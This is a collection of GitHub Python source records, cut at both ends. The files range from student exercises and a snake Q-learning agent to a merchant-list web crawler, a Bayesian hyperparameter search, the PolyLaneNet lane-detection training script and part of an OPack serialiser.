Customer:\r\n    def __init__(self, email: str, name: str, tax: int = 2):\r\n        self.email = email\r\n        self.name = name\r\n        self.tax = tax\r\n\r\n    def total_amount(self, price_of_flat: float):\r\n        return round(self.tax / 100 * price_of_flat + price_of_flat)\r\n
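\r\n# Hedged usage sketch (added; hypothetical values, not from the original file):\r\n#   Customer(\"ann@example.com\", \"Ann\").total_amount(100000)      -> 102000 (2% tax)\r\n#   LoyalCustomer(\"bob@example.com\", \"Bob\").total_amount(100000) -> 101000 (1% tax)\r\n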
\r\nclass LoyalCustomer(Customer):\r\n    def __init__(self, email: str, name: str, tax: int = 1):\r\n        super().__init__(email, name, tax)\r\n\r\n\r\nclass Flat:\r\n    def __init__(self, flat_price: float, flat_address: str):\r\n        self.flat_price = flat_price\r\n        self.flat_address = flat_address\r\n\r\n\r\nclass RealEstateCompany:\r\n    def __init__(self, client_list: list[Customer | LoyalCustomer], flat_list: list[Flat]):\r\n        self.client_list = client_list\r\n        self.flat_list = flat_list\r\n\r\n    def cheapest(self):\r\n        if len(self.flat_list) > 0:\r\n            cheapest_flat = self.flat_list[0]\r\n            for flat in self.flat_list:\r\n                if flat.flat_price < cheapest_flat.flat_price:\r\n                    cheapest_flat = flat\r\n            return cheapest_flat\r\n        else:\r\n            print(\"No flats\")\r\n            return None\r\n\r\n    def sell(self, flat: Flat, client: Customer):\r\n        if flat in self.flat_list and client in self.client_list:\r\n            print(f\"Flat address: {flat.flat_address}, \"\r\n                  f\"Customer email: {client.email}, \"\r\n                  f\"Name: {client.name}, \"\r\n                  f\"Total paid: {client.total_amount(flat.flat_price)}\")\r\n            self.flat_list.remove(flat)\r\n        else:\r\n            print(\"Client or Flat not found\")\r\n","repo_name":"Psyhex/Task-Real-estate-company","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30304739132","text":"filmList = [{\"Name\": \"Inception\", \"Year\": 2010, \"Rating\": 8.7},\n            {\"Name\": \"Inside Out\", \"Year\": 2015, \"Rating\": 8.1},\n            {\"Name\": \"Con Air\", \"Year\": 1997, \"Rating\": 6.9}]\n\ndef filmListFil(film_list,filNavn):\n    with open(filNavn, \"w\") as fineList:\n        for film in film_list:\n            fineList.write(\"{} - {} has a rating of {} \\n\".format(film.get(\"Name\"), film.get(\"Year\"), film.get(\"Rating\")))\n\nfilmListFil(filmList, \"film.txt\")\n\ndef FilmListLes(filNavn):\n    with open(filNavn, \"r\") as lesList:\n        print(lesList.read())\n\nFilmListLes(\"film.txt\")","repo_name":"mentos1337/Sandbox","sub_path":"oblig3_Granit-Salihu/programmeringsoppgave5,3.py","file_name":"programmeringsoppgave5,3.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"311344082","text":"# import of the required libraries\nimport numpy as np\nimport timeit\n\n\nfrom pyGPGO.covfunc import squaredExponential\nfrom pyGPGO.surrogates.GaussianProcess import GaussianProcess\nfrom pyGPGO.surrogates.RandomForest import RandomForest\nfrom pyGPGO.GPGO import GPGO\nfrom pyGPGO.acquisition import Acquisition\nfrom pyGPGO.covfunc import matern32\n\nfrom sklearn import datasets\nfrom sklearn import svm\nfrom sklearn.model_selection import cross_val_score\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D    \nfrom pylab import meshgrid,cm,imshow,contour,clabel,colorbar,axis,title,show\n\n\n#Import Load Wine Dataset\nds = datasets.load_wine()\nprint(\"Dataframe Data Shape: \",ds.data.shape)\nprint(\"Dataframe Target Shape: \", ds.target.shape)\n\ndef compute_accuracy_SVC(C,gamma,coef0):\n    clf = svm.SVC(C=C,gamma=gamma,coef0=coef0)\n    scores = cross_val_score(clf, ds.data, ds.target, cv=10)\n    return (scores.mean())\n\nnp.random.seed(42)\ninitialPoints = 30\nfurtherEvaluations = 120\n\n# defining the hyperparameter search space\nparam = { 'C': ('cont', [0.1,5]),\n          'gamma': ('cont', [0.1,10]),\n          'coef0':('cont',[0.1,10])\n        }  \n\n# creating a GP surrogate model with a Squared Exponential covariance function,\n# aka kernel\nsexp = squaredExponential()\nsur_model_1 = GaussianProcess(sexp)\nsur_model_2 = RandomForest()\n\n# setting the acquisition function\nacq_1 = Acquisition(mode=\"ExpectedImprovement\")\nacq_2 = Acquisition(mode=\"ProbabilityImprovement\")\nacq_3 = Acquisition(mode=\"UCB\")\n\n# creating the Bayesian Optimization objects\n
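# Added note (hedged, from pyGPGO's documented call pattern): GPGO takes\n# (surrogate, acquisition, objective, parameter_dict) and maximizes the\n# objective; run(max_iter, init_evals) evaluates init_evals random points\n# first, then picks each next point by optimizing the acquisition function.\n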
gpgo_gaussian_model_1 = GPGO(sur_model_1,acq_1,compute_accuracy_SVC,param)\ngpgo_gaussian_model_2 = GPGO(sur_model_1,acq_2,compute_accuracy_SVC,param)\ngpgo_gaussian_model_3 = GPGO(sur_model_1,acq_3,compute_accuracy_SVC,param)\n\ngpgo_random_forest_1 = GPGO(sur_model_2,acq_1,compute_accuracy_SVC,param)\ngpgo_random_forest_2 = GPGO(sur_model_2,acq_2,compute_accuracy_SVC,param)\ngpgo_random_forest_3 = GPGO(sur_model_2,acq_3,compute_accuracy_SVC,param)\n\n#Run models\ngaussianModel_1_start = timeit.default_timer()\ngpgo_gaussian_model_1.run(max_iter=furtherEvaluations,init_evals=initialPoints)\ngaussianModel_1_stop = timeit.default_timer()\n\ngaussianModel_2_start = timeit.default_timer()\ngpgo_gaussian_model_2.run(max_iter=furtherEvaluations,init_evals=initialPoints)\ngaussianModel_2_stop = timeit.default_timer()\n\ngaussianModel_3_start = timeit.default_timer()\ngpgo_gaussian_model_3.run(max_iter=furtherEvaluations,init_evals=initialPoints)\ngaussianModel_3_stop = timeit.default_timer()\n\nrandomForest_1_start = timeit.default_timer()\ngpgo_random_forest_1.run(max_iter=furtherEvaluations,init_evals=initialPoints)\nrandomForest_1_stop = timeit.default_timer()\n\nrandomForest_2_start = timeit.default_timer()\ngpgo_random_forest_2.run(max_iter=furtherEvaluations,init_evals=initialPoints)\nrandomForest_2_stop = timeit.default_timer()\n\nrandomForest_3_start = timeit.default_timer()\ngpgo_random_forest_3.run(max_iter=furtherEvaluations,init_evals=initialPoints)\nrandomForest_3_stop = timeit.default_timer()\n\n#Get the results\nprint(\"\\n---Results---\\n\")\nprint(\"\\n\", gpgo_gaussian_model_1.getResult())\nprint('Gaussian Model 1 Time: ', gaussianModel_1_stop - gaussianModel_1_start) \nprint(\"\\n\", gpgo_gaussian_model_2.getResult())\nprint('Gaussian Model 2 Time: ', gaussianModel_2_stop - gaussianModel_2_start) \nprint(\"\\n\", gpgo_gaussian_model_3.getResult())\nprint('Gaussian Model 3 Time: ', gaussianModel_3_stop - gaussianModel_3_start) \n\nprint(\"\\n\", gpgo_random_forest_1.getResult())\nprint('Random Forest 1 Time: ', randomForest_1_stop - randomForest_1_start) \nprint(\"\\n\", gpgo_random_forest_2.getResult())\nprint('Random Forest 2 Time: ', randomForest_2_stop - randomForest_2_start) \nprint(\"\\n\",gpgo_random_forest_3.getResult())\nprint('Random Forest 3 Time: ', randomForest_3_stop - randomForest_3_start) \n\n\n#------------------------------\n#GRID SEARCH\nxrange = list(param.values())[0][1]\nyrange = list(param.values())[1][1]\nzrange = list(param.values())[2][1]\n\n\nC_values = np.linspace(xrange[0],xrange[1],5)\ngamma_values = np.linspace(yrange[0],yrange[1],6)\ndef0 = np.linspace(zrange[0],zrange[1],5)\n\nres = [0 for n in range(150)]\ncount = 0\ngrid_search_start = timeit.default_timer()\nfor cc in C_values:\n    for gg in gamma_values:\n        for dd in def0:\n            res[count] = compute_accuracy_SVC( cc, gg, dd )\n            count = count+1\n\ngrid_search_stop = timeit.default_timer()\n\nprint(\"\\nGrid Search, Best on Grid: \"+str(round(max(np.asarray(res)),2)))\nprint('Grid Search Time: ', grid_search_stop - grid_search_start) \n    \n\n\nprint(\"\\n\\n---Finish---\")","repo_name":"JeyDi/BayesianMLOptimization","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":4620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"20057727554","text":"# encoding:utf-8\nimport re\nimport os\nimport json\nimport time\nimport aiohttp\nimport asyncio\nfrom lxml import etree\n\nclass Crawler:\n\n
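    # Added note (hedged overview): this class is a standard asyncio\n    # producer/consumer setup. crawl() fills a Queue with URLs plus one None\n    # sentinel per worker, and each _worker() coroutine returns when it pops a\n    # sentinel; the minimal shape of that pattern is:\n    #   while (item := await queue.get()) is not None:\n    #       ...handle item...\n\n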
    def __init__(self, urls, max_workers=8):\n        self.urls = urls\n        self.folder = ''\n        self.fetching = asyncio.Queue()\n        self.max_workers = max_workers\n        self.headers = {\n            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36',\n            'Referer': 'https://www.sandpay.com.cn/shop/merchantList.html',\n            'Host': 'www.sandpay.com.cn',\n        }\n    async def crawl(self):\n        # DON'T await here; start consuming things out of the queue, and\n        # meanwhile execution of this function continues. We'll start\n        # max_workers coroutines to fetch and process pages.\n        all_the_coros = asyncio.gather(\n            *[self._worker(i) for i in range(self.max_workers)])\n\n        # place all URLs on the queue\n        for url in self.urls:\n            await self.fetching.put(url)\n\n        # now put a bunch of `None`'s in the queue as signals to the workers\n        # that there are no more items in the queue.\n        for _ in range(self.max_workers):\n            await self.fetching.put(None)\n\n        # now make sure everything is done\n        await all_the_coros\n\n    async def _worker(self, i):\n        while True:\n            url = await self.fetching.get()\n            if url is None:\n                # this coroutine is done; simply return to exit\n                return\n\n            # print(f'Fetch worker {i} is fetching a URL: {url}')\n            async with aiohttp.ClientSession() as session:\n                await self.SaveData(session, url)\n\n    async def SaveData(self, session, url):\n        # print(type(data))\n        tmp = url.split('?')\n        url = tmp[0]\n        pageNo = tmp[-1:][0]\n        data = {\n            'province':'901',\n            'district' : '',\n            'district2' : '',\n            'shopTypes' : '',\n            'payTypes' : '',\n            'cardNumFive': '',\n            'shortName' : '',\n            'address': '',\n            'isSupportYj': '',\n            'shopMemo' : '1',\n            'pageNo': pageNo,\n        }\n        file = self.folder + pageNo.zfill(5)+ '.json'\n        isFileExists = os.path.exists(file)\n        if not isFileExists:\n            async with session.post(url, headers=self.headers, data=data, timeout=5, verify_ssl=False) as response:\n                print('save to .json file, page is: ' + pageNo)\n                try:\n                    response = await response.json()\n                    with open(file, 'w') as f:\n                        f.write(json.dumps(response))\n\n                except Exception as e:\n                    with open('error.log', 'w') as f:\n                        f.write('error page is ' + pageNo)\n                    return\n\n\ndef test():\n    import requests\n    # disable https certificate verification warnings\n    requests.packages.urllib3.disable_warnings()\n\n    headers = {\n        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36',\n        'Referer': 'https://www.sandpay.com.cn/shop/merchantList.html',\n        'Host': 'www.sandpay.com.cn',\n    }\n    url = 'https://www.sandpay.com.cn/shop/getMerchantPage'\n    # 1. import Python's SSL handling module\n    # import ssl\n    # 2. ignore unverified SSL certificates
\n    # Econtext = ssl._create_unverified_context()\n\n    data ={\n        'province':'901', # Shanghai\n        #'province':'902', # Jiangsu\n        #'province':'903', # Zhejiang\n        #'province':'904', # Beijing\n        'district' : '',\n        'district2' : '',\n        'shopTypes' : '',\n        'payTypes' : '',\n        'cardNumFive': '',\n        'shortName' : '',\n        'address': '',\n        'isSupportYj': '',\n        'shopMemo' : '1',\n        'pageNo': '1',\n    }\n    r = requests.post(url, headers=headers, data=data,verify=False)\n\n    if r.status_code == 200: # ok\n        jsonp = r.json()\n        pageCount = jsonp['pageCount']\n\n        urlList = [url+'?'+str(e) for e in range(1, int(pageCount)+1)]\n        # print(urlList)\n        print('Total url pages: ', len(urlList))\n        c = Crawler(urlList)\n        c.folder = './data/'\n        isExists = os.path.exists(c.folder)\n        if not isExists:\n            os.makedirs(c.folder)\n        asyncio.run(c.crawl())\n        print('OK')\n\n\nif __name__=='__main__':\n    start = time.time()\n    test()\n    end = time.time()\n    print(\"Finished, time consumed: {}\".format(end-start))\n","repo_name":"TopShares/Python","sub_path":"Spider/sandpay.com.cn/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"31813767298","text":"# we have a string - the result must be the first and the last 2 characters of the string\n\nname = \"My Name is Sahil Nagpal and I love Programming\"\n\nfirst2index = name[:2]\nlast2index = name[len(name)-2:len(name)]\nprint(first2index + last2index)\n#print(last2index)\n\n#string.replace(old, new, count)\nprint(name.replace('e','r',2))\n\n\n# question - find the longest word and print the word and its length\n# question - remove the nth index element from the string\n\n\n\n\n\n\n\n\n","repo_name":"Swaraajain/learnPython","sub_path":"learn.python.loops/stringQuestions.py","file_name":"stringQuestions.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"72666488096","text":"import numpy as np\nimport helper\nimport random\n\n# This class has all the functions and variables necessary to implement the snake game\n# We will be using Q learning to do this\n# Credits to Chitian Hao for the help!\nclass SnakeAgent:\n\n    # This is the constructor for the SnakeAgent class\n    # It initializes the actions that can be made,\n    # Ne, which is a parameter used to perform exploration before settling on an action,\n    # LPC, which is a parameter used in calculating the learning rate (lr),\n    # gamma, which balances immediate and future reward,\n    # Q, which is the q-table used in Q-learning, and\n    # N, which counts visits to each (state, action) pair so under-explored\n    # moves can be tried before the q-table is trusted\n    def __init__(self, actions, Ne, LPC, gamma):\n        self.actions = actions\n        self.Ne = Ne\n        self.LPC = LPC\n        self.gamma = gamma\n        self.reset()\n\n        # Create the Q and N Table to work with\n        self.Q = helper.initialize_q_as_zeros()\n        self.N = helper.initialize_q_as_zeros()\n\n\n    # This function sets if the program is in training mode or testing mode.\n    def set_train(self):\n        self._train = True\n
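\n    # Added note (hedged): in agent_action() below, any action whose visit count\n    # N(s, a) is still below Ne is given an optimistic value of 1, forcing early\n    # exploration; afterwards the learned Q-value is used and updated with\n    #   Q <- Q + alpha * (r + gamma * max_a' Q(s', a') - Q),  alpha = LPC / (LPC + N(s, a))\n\n    # This function sets if the program is in training mode or testing mode. 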
\n def set_eval(self):\n self._train = False\n\n # Calls the helper function to save the q-table after training\n def save_model(self):\n helper.save(self.Q)\n\n # Calls the helper function to load the q-table when testing\n def load_model(self):\n self.Q = helper.load()\n\n # resets the game state\n def reset(self):\n self.points = 0\n self.s = None\n self.a = None\n \n # Function Helper:It gets the current state, and based on the \n # current snake head location, body and food location,\n # determines which move(s) it can make by also using the \n # board variables to see if its near a wall or if the\n # moves it can make lead it into the snake body and so on. \n # Returns a list of variables that help you keep track of\n # conditions mentioned above.\n def helper_func(self, state):\n print(\"IN helper_func\")\n head = [state[0],state[1]]\n head_x = head[0]\n head_y = head[1]\n body = state[2]\n food = [state[3], state[4]]\n food_x = food[0]\n food_y = food[1]\n body_list = []\n for i, j in body: body_list.append([i,j])\n wall_hit = [0,0]\n direction_of_food = [0,0]\n snake_body = []\n\n if head_x == 40: wall_hit[0] = 1\n elif head_x == 480: wall_hit[0] = 2\n else: wall_hit[0] = 0\n if head_y == 40: wall_hit[1] = 1\n elif head_y == 480: wall_hit[1] = 2\n else: wall_hit[1] = 0\n\n if (food_x - head_x) > 0: direction_of_food[0] = 2\n elif (food_x - head_x) < 0: direction_of_food[0] = 1\n else: direction_of_food[0] = 0\n if (food_y - head_y) > 0: direction_of_food[1] = 2\n elif (food_y - head_y) < 0: direction_of_food[1] = 1\n else: direction_of_food[1] = 0\n\n if [head_x, head_y-1] in body_list: collision = 1 \n else: collision = 0\n snake_body.append(collision)\n if [head_x, head_y+1] in body_list: collision = 1 \n else: collision = 0\n snake_body.append(collision)\n if [head_x-1, head_y] in body_list: collision = 1\n else: collision = 0\n snake_body.append(collision)\n if ((head_x+1, head_y) in body_list): collision = 1\n else: collision = 0\n snake_body.append(collision)\n condition_list = [wall_hit[0],wall_hit[1],direction_of_food[0],direction_of_food[1],snake_body[0],snake_body[1],snake_body[2],snake_body[3]]\n return condition_list\n\n # Computing the reward.\n def compute_reward(self, points, dead):\n if dead:\n return -1\n elif points > self.points:\n return 1\n else:\n return -0.1\n\n\n def agent_action(self, state, points, dead):\n print(\"IN AGENT_ACTION\")\n\n def change(state,dead,points,previous_state,previous_action):\n previous_move = self.helper_func(previous_state)\n r = self.compute_reward(points, dead)\n present_state = self.helper_func(state)\n upper = self.Q[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][0]\n bottom = self.Q[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][1]\n left = self.Q[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][2]\n right = self.Q[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][3]\n action = max(upper, bottom, left, right)\n q = self.Q[previous_move[0]][previous_move[1]][previous_move[2]][previous_move[3]][previous_move[4]][previous_move[5]][previous_move[6]][previous_move[7]][previous_action]\n alpha = self.LPC / (self.LPC + 
self.N[previous_move[0]][previous_move[1]][previous_move[2]][previous_move[3]]\n [previous_move[4]][previous_move[5]][previous_move[6]][previous_move[7]][previous_action])\n change = q + alpha * (r + self.gamma * action - q)\n return change\n Qvalues = [0, 0, 0, 0]\n if dead:\n previous_state = self.helper_func(self.s)\n self.Q[previous_state[0]][previous_state[1]][previous_state[2]][previous_state[3]][previous_state[4]][previous_state[5]][previous_state[6]][previous_state[7]][self.a] = change(state, dead, points, self.s, self.a)\n self.reset()\n return\n present_state = self.helper_func(state)\n if self._train and self.s != None and self.a != None:\n previous_state = self.helper_func(self.s)\n new_q = change(state, dead, points, self.s, self.a)\n self.Q[previous_state[0]][previous_state[1]][previous_state[2]][previous_state[3]][previous_state[4]][previous_state[5]][previous_state[6]][previous_state[7]][self.a] = new_q\n for i in range(helper.NUM_ACTIONS):\n n = self.N[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][i]\n q = self.Q[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][i]\n if n < self.Ne:\n Qvalues[i] = 1\n else:\n Qvalues[i] = q\n action = np.argmax(Qvalues)\n max_action = max(Qvalues)\n for i in range(len(Qvalues)-1, -1, -1):\n if Qvalues[i] == max_action:\n action = i\n break\n self.N[present_state[0]][present_state[1]][present_state[2]][present_state[3]][present_state[4]][present_state[5]][present_state[6]][present_state[7]][action] += 1\n self.s = state\n self.a = action\n self.points = points\n return action","repo_name":"Nandhaaramakrishnan/UCSC-CSE240","sub_path":"Assignment_5/snake_agent.py","file_name":"snake_agent.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"23215375986","text":"import matplotlib.pyplot as plt\n\n\n\n\nmatriz = []\nletrasdospontos = []\nquantpontos = 0\ncaminhos = []\ndronometros = []\nnew = []\n\nwith open('matriz.txt') as f:\n while True:\n linhas,colunas=f.readline().split()\n lines=f.read().splitlines()\n break\n \n \nquantcaminhos = 0\nlinhas=int(linhas)\ncolunas=int(colunas)\n\nfor l in range (linhas):\n a = []\n for k in range (len(lines[0])):\n if lines[l][k]!=' ':\n ponto = lines[l][k]\n a.append(ponto)\n if not (ponto=='R' or ponto=='0'):\n letrasdospontos.append (ponto)\n quantpontos +=1\n\n matriz.append (a)\n\n\ndef permutacao_gerador (lista):\n if len(lista)<=1:\n yield lista\n return\n for i, atual in enumerate(lista):\n elementos_restantes = lista[:i]+lista[i+1:]\n for p in permutacao_gerador (elementos_restantes):\n yield [atual]+p\n\n\n\nfor i, p in enumerate(permutacao_gerador(letrasdospontos)):\n caminhos.append (p)\n print (p)\n \n\n\nfor z in range(len(caminhos)):\n for v in range (quantpontos+1):\n if v==0:\n distt=0\n for x in range(linhas):\n for y in range(colunas):\n if matriz[x][y]=='R':\n for t in range(linhas):\n for u in range(colunas):\n if matriz[t][u]==caminhos[z][v]:\n distX = u-y\n if u-y<0:\n distX=y-u\n distY=t-x\n if t-x<0:\n distY=x-t\n distt=distY+distX\n if (v>0 and v 100:\n iter_times = iter_times[-ITER_TIME_WINDOW:]\n if (i + 1) % ITER_LOG_INTERVAL == 0:\n loss_str = ', '.join(\n ['{}: {:.4f}'.format(loss_name, loss_dict_i[loss_name]) for loss_name in loss_dict_i])\n logging.info(\"Epoch [{}/{}], Step [{}/{}], 
Loss: {:.4f} ({}), s/iter: {:.4f}, lr: {:.1e}\".format(\n epoch,\n num_epochs,\n i + 1,\n total_step,\n accum_loss / (i + 1),\n loss_str,\n np.mean(iter_times),\n optimizer.param_groups[0][\"lr\"],\n ))\n logging.info(\"Epoch time: {:.4f}\".format(time() - epoch_t0))\n if epoch % MODEL_SAVE_INTERVAL == 0 or epoch == num_epochs:\n model_path = os.path.join(exp_dir, \"models\", \"model_{:03d}.pt\".format(epoch))\n save_train_state(model_path, model, optimizer, scheduler, epoch)\n if val_loader is not None:\n evaluator = Evaluator(val_loader.dataset, exp_root)\n evaluator, val_loss = test(\n model,\n val_loader,\n evaluator,\n None,\n cfg,\n view=False,\n epoch=-1,\n verbose=False,\n )\n _, results = evaluator.eval(label=None, only_metrics=True)\n logging.info(\"Epoch [{}/{}], Val loss: {:.4f}\".format(epoch, num_epochs, val_loss))\n model.train()\n scheduler.step()\n logging.info(\"Training time: {:.4f}\".format(time() - t0))\n\n return model\n\n\ndef save_train_state(path, model, optimizer, lr_scheduler, epoch):\n train_state = {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'lr_scheduler': lr_scheduler.state_dict(),\n 'epoch': epoch\n }\n\n torch.save(train_state, path)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"Train PolyLaneNet\")\n parser.add_argument(\"--exp_name\", default=\"default\", help=\"Experiment name\", required=True)\n parser.add_argument(\"--cfg\", default=\"config.yaml\", help=\"Config file\", required=True)\n parser.add_argument(\"--resume\", action=\"store_true\", help=\"Resume training\")\n parser.add_argument(\"--validate\", action=\"store_true\", help=\"Validate model during training\")\n parser.add_argument(\"--deterministic\",\n action=\"store_true\",\n help=\"set cudnn.deterministic = True and cudnn.benchmark = False\")\n\n return parser.parse_args()\n\n\ndef get_code_state():\n state = \"Git hash: {}\".format(\n subprocess.run(['git', 'rev-parse', 'HEAD'], stdout=subprocess.PIPE).stdout.decode('utf-8'))\n state += '\\n*************\\nGit diff:\\n*************\\n'\n state += subprocess.run(['git', 'diff'], stdout=subprocess.PIPE).stdout.decode('utf-8')\n\n return state\n\n\ndef setup_exp_dir(exps_dir, exp_name, cfg_path):\n dirs = [\"models\"]\n exp_root = os.path.join(exps_dir, exp_name)\n\n for dirname in dirs:\n os.makedirs(os.path.join(exp_root, dirname), exist_ok=True)\n\n shutil.copyfile(cfg_path, os.path.join(exp_root, 'config.yaml'))\n with open(os.path.join(exp_root, 'code_state.txt'), 'w') as file:\n file.write(get_code_state())\n\n return exp_root\n\n\ndef get_exp_train_state(exp_root):\n models_dir = os.path.join(exp_root, \"models\")\n models = os.listdir(models_dir)\n last_epoch, last_modelname = sorted(\n [(int(name.split(\"_\")[1].split(\".\")[0]), name) for name in models],\n key=lambda x: x[0],\n )[-1]\n train_state = torch.load(os.path.join(models_dir, last_modelname))\n\n return train_state\n\n\ndef log_on_exception(exc_type, exc_value, exc_traceback):\n logging.error(\"Uncaught exception\", exc_info=(exc_type, exc_value, exc_traceback))\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n cfg = Config(args.cfg)\n\n # Set up seeds\n torch.manual_seed(cfg['seed'])\n np.random.seed(cfg['seed'])\n random.seed(cfg['seed'])\n\n if args.deterministic:\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n # Set up experiment\n if not args.resume:\n exp_root = setup_exp_dir(cfg['exps_dir'], args.exp_name, args.cfg)\n else:\n exp_root = 
os.path.join(cfg['exps_dir'], os.path.basename(os.path.normpath(args.exp_name)))\n\n logging.basicConfig(\n format=\"[%(asctime)s] [%(levelname)s] %(message)s\",\n level=logging.INFO,\n handlers=[\n logging.FileHandler(os.path.join(exp_root, \"log.txt\")),\n logging.StreamHandler(),\n ],\n )\n\n sys.excepthook = log_on_exception\n\n logging.info(\"Experiment name: {}\".format(args.exp_name))\n logging.info(\"Config:\\n\" + str(cfg))\n logging.info(\"Args:\\n\" + str(args))\n\n # Get data sets\n train_dataset = cfg.get_dataset(\"train\")\n\n # Device configuration\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n # Hyper parameters\n num_epochs = cfg[\"epochs\"]\n batch_size = cfg[\"batch_size\"]\n\n # Model\n model = cfg.get_model().to(device)\n\n train_state = None\n if args.resume:\n train_state = get_exp_train_state(exp_root)\n\n # Data loader\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=8)\n\n if args.validate:\n val_dataset = cfg.get_dataset(\"val\")\n val_loader = torch.utils.data.DataLoader(dataset=val_dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=8)\n # Train regressor\n try:\n model = train(\n model,\n train_loader,\n exp_root,\n cfg,\n val_loader=val_loader if args.validate else None,\n train_state=train_state,\n )\n except KeyboardInterrupt:\n logging.info(\"Training session terminated.\")\n test_epoch = -1\n if cfg['backup'] is not None:\n subprocess.run(['rclone', 'copy', exp_root, '{}/{}'.format(cfg['backup'], args.exp_name)])\n\n # Eval model after training\n test_dataset = cfg.get_dataset(\"test\")\n\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=8)\n\n evaluator = Evaluator(test_loader.dataset, exp_root)\n\n logging.basicConfig(\n format=\"[%(asctime)s] [%(levelname)s] %(message)s\",\n level=logging.INFO,\n handlers=[\n logging.FileHandler(os.path.join(exp_root, \"test_log.txt\")),\n logging.StreamHandler(),\n ],\n )\n logging.info('Code state:\\n {}'.format(get_code_state()))\n _, mean_loss = test(model, test_loader, evaluator, exp_root, cfg, epoch=test_epoch, view=False)\n logging.info(\"Mean test loss: {:.4f}\".format(mean_loss))\n\n evaluator.exp_name = args.exp_name\n\n eval_str, _ = evaluator.eval(label='{}_{}'.format(os.path.basename(args.exp_name), test_epoch))\n\n logging.info(eval_str)\n","repo_name":"lucastabelini/PolyLaneNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9332,"program_lang":"python","lang":"en","doc_type":"code","stars":276,"dataset":"github-code","pt":"34"} +{"seq_id":"31328510004","text":"import copy\nimport datetime\nimport struct\nfrom enum import Enum, auto\nfrom typing import Tuple\n\nfrom opack.exceptions import BytesTooLargeError, IntegerOutOfBoundsError, InvalidTypeError\n\n\nclass TerminatorObject:\n \"\"\"Used to imitate the \\x03 terminator in the construct struct\"\"\"\n pass\n\n\ndef _get_bool_object_type(obj) -> int:\n if obj:\n return 1\n return 2\n\n\ndef _get_set_object_type(obj) -> int:\n return 3\n\n\ndef _get_datetime_object_time(obj) -> int:\n return 6\n\n\ndef _get_int_object_type(obj) -> int:\n if obj < 0:\n return _get_float_object_type(obj)\n elif obj <= 0x27:\n return obj + 8\n elif obj.bit_length() <= 8:\n return 0x30\n elif obj.bit_length() <= 32:\n return 0x32\n elif obj.bit_length() <= 64:\n return 0x33\n raise IntegerOutOfBoundsError(f'{obj} is too big for uint64_t')\n\n\ndef 
_get_float_object_type(obj) -> int:\n if struct.unpack('f', struct.pack('f', obj))[0] == obj: # check if the number fits in a c float\n return 0x35\n else:\n return 0x36\n\n\ndef _get_str_object_type(obj) -> int:\n obj_len = len(obj.encode())\n if obj_len <= 0x20:\n return 0x40 + obj_len\n elif obj_len <= 0xFF:\n return 0x61\n elif obj_len <= 0xFFFF:\n return 0x62\n elif obj_len < 2 ** 32:\n return 0x63\n return 0x64\n\n\ndef _get_bytes_object_type(obj) -> int:\n obj_len = len(obj)\n if obj_len <= 0x20:\n return 0x70 + obj_len\n elif obj_len <= 0xFF:\n return 0x91\n elif obj_len <= 0xFFFF:\n return 0x92\n elif obj_len < 2 ** 32:\n return 0x93\n elif obj_len < 2 ** 64:\n return 0x94\n raise BytesTooLargeError(f'bytes are too large ({obj_len})')\n\n\ndef _get_list_object_type(obj) -> int:\n if len(obj) < 15:\n return 0xD0 + len(obj)\n else:\n obj = copy.copy(obj)\n obj.append(TerminatorObject())\n return 0xDF, obj\n\n\ndef _get_dict_object_type(obj) -> Tuple[int, list]:\n obj_len = len(obj)\n obj = list(obj.items())\n if obj_len < 15:\n return 0xE0 + obj_len, obj\n else:\n obj.append((TerminatorObject(), TerminatorObject()))\n return 0xEF, obj\n\n\nOBJ_TYPE_MAP = {\n bool: _get_bool_object_type, datetime.datetime: _get_datetime_object_time, TerminatorObject: _get_set_object_type,\n int: _get_int_object_type, float: _get_float_object_type, str: _get_str_object_type,\n bytes: _get_bytes_object_type, list: _get_list_object_type, dict: _get_dict_object_type\n}\n\n\nclass OPackObjectType(Enum):\n BOOL = auto()\n TERMINATOR = auto()\n TIMESTAMP = auto()\n INT = auto()\n STRING = auto()\n BYTES = auto()\n ARRAY_LENGTHED = auto()\n 